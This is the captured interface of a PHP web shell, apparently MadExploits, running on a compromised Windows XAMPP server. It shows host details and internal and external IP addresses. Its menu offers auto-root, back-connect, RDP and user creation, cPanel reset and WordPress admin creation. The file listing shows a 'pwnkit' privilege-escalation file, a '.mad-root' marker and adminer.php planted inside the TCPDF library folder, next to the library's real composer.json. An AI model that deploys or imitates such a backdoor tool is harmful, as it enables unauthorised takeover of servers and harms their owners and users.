Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 216.73.216.9
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
phpMyAdmin /
vendor /
tecnickcom /
tcpdf /
[ HOME SHELL ]
Name
Size
Permission
Action
config
[ DIR ]
drwxrwxrwx
fonts
[ DIR ]
drwxrwxrwx
include
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-rw-rw-
CHANGELOG.TXT
119.43
KB
-rw-rw-rw-
LICENSE.TXT
42.66
KB
-rw-rw-rw-
README.md
4.66
KB
-rw-rw-rw-
VERSION
6
B
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
composer.json
1.29
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
tcpdf.php
884.74
KB
-rw-rw-rw-
tcpdf_autoconfig.php
6.99
KB
-rw-rw-rw-
tcpdf_barcodes_1d.php
71.58
KB
-rw-rw-rw-
tcpdf_barcodes_2d.php
14.33
KB
-rw-rw-rw-
tcpdf_import.php
3.21
KB
-rw-rw-rw-
tcpdf_parser.php
26.95
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : composer.json
{ "name": "tecnickcom/tcpdf", "type": "library", "description": "TCPDF is a PHP class for generating PDF documents and barcodes.", "keywords": [ "PDF", "tcpdf", "PDFD32000-2008", "qrcode", "datamatrix", "pdf417", "barcodes" ], "homepage": "http://www.tcpdf.org/", "version": "6.6.2", "license": "LGPL-3.0-only", "authors": [ { "name": "Nicola Asuni", "email": "info@tecnick.com", "role": "lead" } ], "require": { "php": ">=5.3.0" }, "autoload": { "classmap": [ "config", "include", "tcpdf.php", "tcpdf_parser.php", "tcpdf_import.php", "tcpdf_barcodes_1d.php", "tcpdf_barcodes_2d.php", "include/tcpdf_colors.php", "include/tcpdf_filters.php", "include/tcpdf_font_data.php", "include/tcpdf_fonts.php", "include/tcpdf_images.php", "include/tcpdf_static.php", "include/barcodes/datamatrix.php", "include/barcodes/pdf417.php", "include/barcodes/qrcode.php" ] }, "archive": { "exclude": [ "/examples" ] } }
Close